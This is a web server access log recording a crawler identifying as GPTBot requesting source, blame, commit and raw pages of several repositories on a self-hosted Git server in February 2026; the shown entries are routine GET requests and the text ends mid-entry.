"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14240] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:13:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12238] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:13:48:10 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:13:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11999] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" +[17/Feb/2026:13:48:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:13:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14991] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14329] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" +[17/Feb/2026:13:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10195] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10169] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10916] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" +[17/Feb/2026:13:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11682] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23713] [Gzip 15.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23747] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16513] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15586] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13815] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 74.7.227.38] [Length 14724] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:13:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:13:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12178] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:13:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16944] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15935] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" +[17/Feb/2026:13:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" +[17/Feb/2026:13:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:13:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" +[17/Feb/2026:13:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13683] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" +[17/Feb/2026:13:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" +[17/Feb/2026:13:48:38 +0000] - 200 200 - GET https 